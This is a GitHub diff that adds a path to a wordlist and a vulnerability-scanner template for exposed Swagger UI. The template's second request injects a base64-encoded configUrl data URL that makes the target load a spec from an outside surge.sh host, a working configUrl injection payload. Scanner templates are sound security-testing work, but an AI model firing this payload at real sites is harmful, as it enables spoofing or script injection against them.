File tree Expand file tree Collapse file tree 2 files changed +30
-0
lines changed Expand file tree Collapse file tree 2 files changed +30
-0
lines changed Original file line number Diff line number Diff line change 102
102
/apps/frontend/modules/main/templates/loginSuccess.php
103
103
/apps/frontend/modules/main/validate/login.yml
104
104
/auth/login
105
+ /classicapi/doc/
105
106
/auth/login/github
106
107
/auth/login/google
107
108
/auth/login/sentry/
Original file line number Diff line number Diff line change
1
+ id : swagger_51pwn
2
+
3
+ info :
4
+ name : swagger api
5
+ author : 51pwn
6
+ severity : critical
7
+ description : |
8
+ swagger api
9
+
10
+ requests :
11
+ - raw :
12
+ - |
13
+ GET /classicapi/doc/ HTTP/1.1
14
+ Host: {{Hostname}}
15
+ - |
16
+ GET /classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ== HTTP/1.1
17
+ Host: {{Hostname}}
18
+
19
+ matchers-condition : or
20
+ stop-at-first-match : true
21
+ matchers :
22
+ - type : word
23
+ words :
24
+ - ' swagger.yaml'
25
+ condition : and
26
+ - type : word
27
+ words :
28
+ - ' exuberant-ice.surge.sh'
29
+ condition : and
You can’t perform that action at this time.
0 commit comments